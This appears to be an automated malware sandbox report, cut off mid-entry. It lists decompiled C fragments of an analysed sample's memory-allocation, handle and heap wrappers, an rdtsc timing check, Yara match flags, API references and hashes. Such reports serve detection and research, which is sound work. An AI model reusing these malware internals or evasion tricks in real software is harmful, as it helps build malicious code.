                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E004187AA(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t24;

				 *0xFFFFFFFF8673B77C =  *((intOrPtr*)(0xffffffff8673b77c)) - __edx;
				_push(0x8673b7f1);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E004191D0(_t24, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                  0x004187af
                                                  0x004187b0
                                                  0x004187b3
                                                  0x004187bf
                                                  0x004187c7
                                                  0x004187e9
                                                  0x004187ed

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 8a759e3010c769c28920cbdc0a5188e274fdd532e813e23b66d2c7c8647d2de9
                                                  • Instruction ID: 0a50da642d5d52293ca8a7392c608b6c5b5d399a194d9c596a7921e5dd8f9810
                                                  • Opcode Fuzzy Hash: 8a759e3010c769c28920cbdc0a5188e274fdd532e813e23b66d2c7c8647d2de9
                                                  • Instruction Fuzzy Hash: D5F082712001087FCB14DF99CC84EEB77A9EF88340F14424DFE0997241C130E810CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                  0x004187bf
                                                  0x004187c7
                                                  0x004187e9
                                                  0x004187ed

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004186FA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E004186FA(void* __eax, void* __ebx, void* _a4) {
				intOrPtr _v0;
				long _t10;
				void* _t15;

				_push(0xffffffad);
				asm("rcl byte [ebp-0x75], cl");
				_t7 = _v0;
				_t3 = _t7 + 0x10; // 0x300
				_t4 = _t7 + 0xc50; // 0x409773
				E004191D0(_t15, _v0, _t4,  *_t3, 0, 0x2c);
				_t10 = NtClose(_a4); // executed
				return _t10;
			}






                                                  0x004186fd
                                                  0x004186ff
                                                  0x00418703
                                                  0x00418706
                                                  0x0041870f
                                                  0x00418717
                                                  0x00418725
                                                  0x00418729

                                                  APIs
                                                  • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 5d0704b7dd65259211e0e24f0b18fce230db1598119a02642a62daeed227a0aa
                                                  • Instruction ID: 83035b151df51b8d981c95ac6b822e10becf360a049b9f016f9320289211e9a0
                                                  • Opcode Fuzzy Hash: 5d0704b7dd65259211e0e24f0b18fce230db1598119a02642a62daeed227a0aa
                                                  • Instruction Fuzzy Hash: A6E086352051147FE710DBB5CC49EDB7F68DF45260F184699F9599B682C130A500C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                  0x00418703
                                                  0x00418706
                                                  0x0041870f
                                                  0x00418717
                                                  0x00418725
                                                  0x00418729

                                                  APIs
                                                  • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c61887d11b720f10791fdf9876c8feffbf34e7d7543ebf01d80d5540fbae4740
                                                  • Instruction ID: 831ee23c1682f032a8af1654e37081e19b7904b52a655b2666c86ae04ffcbe4f
                                                  • Opcode Fuzzy Hash: c61887d11b720f10791fdf9876c8feffbf34e7d7543ebf01d80d5540fbae4740
                                                  • Instruction Fuzzy Hash: 4A90026260100902E20171A95414616000A97D0381F91C032A1014559ECAA58992F171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2d23b040fcd2e705c7e93d044793119803bc63ef4d9954a9428e0c3c01c77ecf
                                                  • Instruction ID: 6f89d361f7702750bf8b9df1e5645822cd05d1317befb679f611dd3c20f59c6a
                                                  • Opcode Fuzzy Hash: 2d23b040fcd2e705c7e93d044793119803bc63ef4d9954a9428e0c3c01c77ecf
                                                  • Instruction Fuzzy Hash: C690026224204552A645B1A954145074006A7E0381791C022A1404954C85A69856E661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 20f4f437c28a9e5905394910505ae60afd01ba65d5ea3007bfb832c19c42e70a
                                                  • Instruction ID: 7a152553ee9c9132bcf9b32cd17c5beba4bfc5cdc1f440f02049473b2d55d8b7
                                                  • Opcode Fuzzy Hash: 20f4f437c28a9e5905394910505ae60afd01ba65d5ea3007bfb832c19c42e70a
                                                  • Instruction Fuzzy Hash: 6A90027220100813E21161A95514707000997D0381F91C422A041455CD96D68952F161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2208f71e6aef92d4e8b0d4e26ddbfe9b88063c7f217df6ded86ba5141c375e60
                                                  • Instruction ID: 83b3f5f1d528d6f824c26644a7cb189bb65455ac475277ca9272150eb4e82d09
                                                  • Opcode Fuzzy Hash: 2208f71e6aef92d4e8b0d4e26ddbfe9b88063c7f217df6ded86ba5141c375e60
                                                  • Instruction Fuzzy Hash: 899002A234100842E20061A95424B060005D7E1341F51C025E1054558D8699CC52B166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 421a7ac2a44de89fcfbc349a6f77e0d7a5cb937f191fb1c563a492a5b5adc8f2
                                                  • Instruction ID: 3462aa82325b6f25487a5844acc9cc17901f152332ee98d0d9f425744911656d
                                                  • Opcode Fuzzy Hash: 421a7ac2a44de89fcfbc349a6f77e0d7a5cb937f191fb1c563a492a5b5adc8f2
                                                  • Instruction Fuzzy Hash: 3D9002A220200403920571A95424616400A97E0341B51C031E1004594DC5A58891B165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a6f0e40196d30487c59d920c484a8e48484cdc2b334dbe5b976358f0e65763b1
                                                  • Instruction ID: 3fd7692da924dff768d25781c9bf38eb6f28bf4e7f5be465f2b8910318e28b52
                                                  • Opcode Fuzzy Hash: a6f0e40196d30487c59d920c484a8e48484cdc2b334dbe5b976358f0e65763b1
                                                  • Instruction Fuzzy Hash: DB9002B220100802E24071A95414746000597D0341F51C021A5054558E86D98DD5B6A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a90d1303eda9e3ef1a1fe7d9bde6ff8d53ab88be14ed011694b7e77cb43f7f4e
                                                  • Instruction ID: ba63e21c81e6a484f23fb9970df0f7da568f7993da9995ba8dfb86b68d897c43
                                                  • Opcode Fuzzy Hash: a90d1303eda9e3ef1a1fe7d9bde6ff8d53ab88be14ed011694b7e77cb43f7f4e
                                                  • Instruction Fuzzy Hash: BD900266211004035205A5A91714507004697D5391351C031F1005554CD6A18861A161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a0b4fcb789ca73c23c3ff5932c23f3d8f3d837d10845c2427826223c5b8c8f2e
                                                  • Instruction ID: 32c0e46f20df40d6878674becb988c8e46be92521e37a6c5f2672946cd4b8446
                                                  • Opcode Fuzzy Hash: a0b4fcb789ca73c23c3ff5932c23f3d8f3d837d10845c2427826223c5b8c8f2e
                                                  • Instruction Fuzzy Hash: 7790027220108C02E21061A9941474A000597D0341F55C421A441465CD86D58891B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1da117924c4e117f3c18c3b2798317a5027fc5ea3615f7692a8bd62ffb62762a
                                                  • Instruction ID: 51ebff7c342d586b524f6cbbcbfb59d0eb8ddd7c8caf4965b8dbdcc658b20e95
                                                  • Opcode Fuzzy Hash: 1da117924c4e117f3c18c3b2798317a5027fc5ea3615f7692a8bd62ffb62762a
                                                  • Instruction Fuzzy Hash: 9C90027220140802E20061A9582470B000597D0342F51C021A1154559D86A58851B5B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 17c00758b3d1adb3a606375b87e36bcb75305f236c5d8410bde241e786b88ebe
                                                  • Instruction ID: e27ca0cc478e0e938cb332b4a3402d7217efe5aeb8e0e713fce1a1573431efde
                                                  • Opcode Fuzzy Hash: 17c00758b3d1adb3a606375b87e36bcb75305f236c5d8410bde241e786b88ebe
                                                  • Instruction Fuzzy Hash: 6C90026260100442924071B998549064005BBE1351751C131A0988554D85D98865A6A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 61f27de83ef31b65376c60b265b66aeac25c03e2b900293c69b9304b41db7495
                                                  • Instruction ID: f4df31be556de2658a3de50ec2bfe787fc5af010b55026b62ece46247f608183
                                                  • Opcode Fuzzy Hash: 61f27de83ef31b65376c60b265b66aeac25c03e2b900293c69b9304b41db7495
                                                  • Instruction Fuzzy Hash: CB90026221180442E30065B95C24B07000597D0343F51C125A0144558CC9958861A561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 826c9fc601b07de9e49f0c453612feca9ec9c3a97a6ba2e5b49ada49d910cd18
                                                  • Instruction ID: 17e79b2e71dddcaf9902b0e3d80c7c2c1d343d8d03119473b89b913fb665f4b9
                                                  • Opcode Fuzzy Hash: 826c9fc601b07de9e49f0c453612feca9ec9c3a97a6ba2e5b49ada49d910cd18
                                                  • Instruction Fuzzy Hash: 1790027220100C02E28071A9541464A000597D1341F91C025A0015658DCA958A59B7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f89a0bd7fae843267434623bd54b2c71c84fb484771c1894fec004c30f8c1e4f
                                                  • Instruction ID: fe8947a132c4364eb74eb2b45999c7a4300c9ee690526b9a42991fd28f6781b7
                                                  • Opcode Fuzzy Hash: f89a0bd7fae843267434623bd54b2c71c84fb484771c1894fec004c30f8c1e4f
                                                  • Instruction Fuzzy Hash: 5190026A21300402E28071A9641860A000597D1342F91D425A000555CCC9958869A361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 28aceb3f32cbcf38a3fac0a02780533a399a0411b5f6f850914b2161c5bd968d
                                                  • Instruction ID: 3fa2dd25746b80344bcb69030eaa80a7ca66f50796607755a9ac5963d7771598
                                                  • Opcode Fuzzy Hash: 28aceb3f32cbcf38a3fac0a02780533a399a0411b5f6f850914b2161c5bd968d
                                                  • Instruction Fuzzy Hash: 7990026230100403E24071A964286064005E7E1341F51D021E0404558CD9958856A262
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 98603ce13a989b81b7187703dd92c33779f76149826cd4abcb87f4403f9c0c8d
                                                  • Instruction ID: 4b9a723e65b19f277defb13c8139839f6a212c51196f10b37fcc15e41e285044
                                                  • Opcode Fuzzy Hash: 98603ce13a989b81b7187703dd92c33779f76149826cd4abcb87f4403f9c0c8d
                                                  • Instruction Fuzzy Hash: 4B90027231114802E21061A99414706000597D1341F51C421A081455CD86D58891B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8008a72402e1e00ad90917caf5f76f7940b1a9e5739181f2330b2a7d43d1adc6
                                                  • Instruction ID: efcbb8eb1554506b9cc118147749bd83eda00d615d10edd896e35b51a624c191
                                                  • Opcode Fuzzy Hash: 8008a72402e1e00ad90917caf5f76f7940b1a9e5739181f2330b2a7d43d1adc6
                                                  • Instruction Fuzzy Hash: CB90027220100802E20065E96418646000597E0341F51D021A5014559EC6E58891B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004088E0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407070( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070F0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                  0x004088eb
                                                  0x004088f3
                                                  0x004088f5
                                                  0x004088fa
                                                  0x004088ff
                                                  0x00408912
                                                  0x00408917
                                                  0x00408920
                                                  0x0040892c
                                                  0x0040893f
                                                  0x00408944
                                                  0x00408947
                                                  0x00408950
                                                  0x00408962
                                                  0x00408967
                                                  0x0040896c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040896e
                                                  0x00408972
                                                  0x00000000
                                                  0x00000000
                                                  0x00408974
                                                  0x00000000
                                                  0x00408972
                                                  0x00408976
                                                  0x00408979
                                                  0x0040897f
                                                  0x00408981
                                                  0x0040898c
                                                  0x00408991
                                                  0x00408994
                                                  0x004089a1
                                                  0x004089ac
                                                  0x004089ae
                                                  0x004089b4
                                                  0x004089b8
                                                  0x004089bb
                                                  0x004089bb
                                                  0x004089c2
                                                  0x004089c5
                                                  0x004089ca
                                                  0x004089d7
                                                  0x00408906
                                                  0x00408906
                                                  0x00408906

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                  • Instruction ID: fecb9998d56daf9cfaa78a55d0f1ea928f7019af28acdd4276aec55bf8742b64
                                                  • Opcode Fuzzy Hash: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                  • Instruction Fuzzy Hash: 4C212BB2D4020857CB10E6649E42BFF736C9B50304F04017FE989A2181F639AB498BA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                  0x004188b7
                                                  0x004188c2
                                                  0x004188cd
                                                  0x004188d1

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: F5A
                                                  • API String ID: 1279760036-683449296
                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418912, Relevance: 3.1, APIs: 2, Instructions: 70memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E00418912(signed int __eax, int _a4, void* _a12, long _a16, void* _a20) {
				intOrPtr _v0;
				intOrPtr* __esi;
				void* __ebp;
				void* _t11;
				char _t14;
				void* _t15;
				void* _t19;

				_t11 = (__eax ^ 0x00000093) + 0x658b8b33;
				if(_t11 <= 0) {
					asm("aam 0x94");
					_push(cs);
					asm("loope 0x53");
					__ebp = __esp;
					__eax = _v0;
					_push(__esi);
					__esi = _v0 + 0xc7c;
					__eax =  *__esi;
					ExitProcess(_a4);
				}
				_t1 = _t11 + 0xc74; // 0xc74
				E004191D0(_t19, _t11, _t1, _t15, 0, 0x35);
				_t14 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t14;
			}










                                                  0x00418914
                                                  0x00418919
                                                  0x0041891b
                                                  0x0041891d
                                                  0x0041891e
                                                  0x00418921
                                                  0x00418923
                                                  0x0041892c
                                                  0x00418932
                                                  0x00418942
                                                  0x00418948
                                                  0x00418948
                                                  0x004188ef
                                                  0x004188f7
                                                  0x0041890d
                                                  0x00418911

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitFreeHeapProcess
                                                  • String ID:
                                                  • API String ID: 1180424539-0
                                                  • Opcode ID: 1bd17018bf3751b5ddc4f80b9c52cfd3abdeb7b5da4c5737e4c2d79714466e40
                                                  • Instruction ID: 5bbea642e4930f668c253bd3f61725241b77efc139e8b990d7dc8e7bd443b416
                                                  • Opcode Fuzzy Hash: 1bd17018bf3751b5ddc4f80b9c52cfd3abdeb7b5da4c5737e4c2d79714466e40
                                                  • Instruction Fuzzy Hash: AC113AB22002097BDB14DFA9DC85EEB77ACAF8C750F058659FA0C97241D634E911CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
